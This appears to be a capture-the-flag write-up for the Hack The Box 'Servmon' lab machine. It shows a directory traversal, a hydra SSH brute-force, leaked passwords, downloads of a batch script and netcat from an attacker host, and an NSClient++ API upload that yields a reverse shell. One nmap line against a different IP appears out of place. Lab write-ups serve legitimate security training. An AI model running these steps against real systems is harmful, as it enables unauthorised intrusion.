Servmon-HTB
SUMMARY
Servmon was an easy rated windows machine. The User was straight forward related to NVMS 1000 — Directory Traversal attack and the root part was NSClient++ privilege escalation. In the user part, we have FTP Anonymous Login access that gives us a Confidential text file. Taking advantage of confidential.txt file we performed the NVMS directory traversal attack. We got a few passwords and one password we used in ssh login. In the root part, NSClient++ has vulnerability with the API we put a reverse shell in a script and execute it.
RECON
As standard, we will begin with a Nmap scan against the machine IP.
nmap -sC -sV -oA 10.10.10.184
Some ports are open:
- 21 FTP
- 22/TCP (SSH)
- 80/TCP (HTTP)
- 8443/TCP (HTTPS)
We started access FTP with Anonymous default credentials. After searching the user Nadine directory. We found one interesting file “Confidential.txt”
Command
$ ftp 10.10.10.184
Confidential.txt file contains the message from Nathan's user.
We got a hint that password.txt is on desktop. We enumerated port 80.
We visited port 80 and landed on a login page. This web server is hosting Network Surveillance Management Software. NVMS-1000 is a monitoring client that is specially designed for network video surveillance
We used Metasploit to perform the NVMS traversal attack. We gave the file path .i.e. User/Nathan/Desktop/Passwords.txt.
After running the command we successfully execute our attack and got some passwords in the root directory.
Now, we have 7 passwords. We saved all the passwords into a text file.
We performed a brute-force attack on port 22 SSH with a hydra tool. To make sure which password is correct. The hydra tool gives us a password in just 4 seconds.
PASSWORD: L1k3B1gBut7s@W0rk
Command
# hydra -L users -P passwords ssh://10.10.10.184
We log in on 22 SSH and we got our first user flag.
Command
# Ssh Nathan@10.10.10.184
After successful login, we got our 1st user flag.
PRIVILEGE ESCALATION
We enumerated the files in the shell and we found the nsclient.ini file. Now we have to do some port forwarding so that we can access the local host.
╗┐# If you want to fill this file with all available options run the following command:
# nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
# nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help
; in flight - TODO
[/settings/default]
; Undocumented key
password = ew2x6SsGTxjRwXOT
; Undocumented key
allowed hosts = 127.0.0.1We executed ssh command from the host machine and set up a port forwarding with -L.
Command
# ssh -l Nadine 10.10.10.184 -L 8443:127.0.0.1:8443
Now we can connect the application on the local host. The password for the login page given in the nsclient.ini file.
Login with ew2x6SsGTxjRwXOT a password. We are in NSClient++ dashboard.
Add script foobar to call evil.2bat and save settings”
We go in the “Settings” menu and click “Add new” to add our script “evil.bat”
We created an evil2.bat file in our host machine. Our reverse shell command is in the evil2.bat file.
Command
#Invoke-WebRequest “http://10.10.14.37:8000/evil2.bat" -OutFile c:\Temp\evil2.bat
# Invoke-WebRequest “http://10.10.14.37:8000/nc.exe" -OutFile c:\Temp\nc.exe
As you can see in the below figure our reverse shell script.
nmap -sC -sV -oA 10.10.10.159
Command run from the normal shell.
We can use the following curl call to upload that as an evil2.bat file.
Command
# curl -s -k -u admin -X PUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/evil2.bat — data-binary @evil2.batReference:
we query the command.
Command
# curl -s -k -u admin https://127.0.0.1:8443/api/v1/queries
Reference:
We got our reverse shell and our last root flag.
Thanks for reading.
Hack The Box Profile: https://www.hackthebox.eu/profile/116842
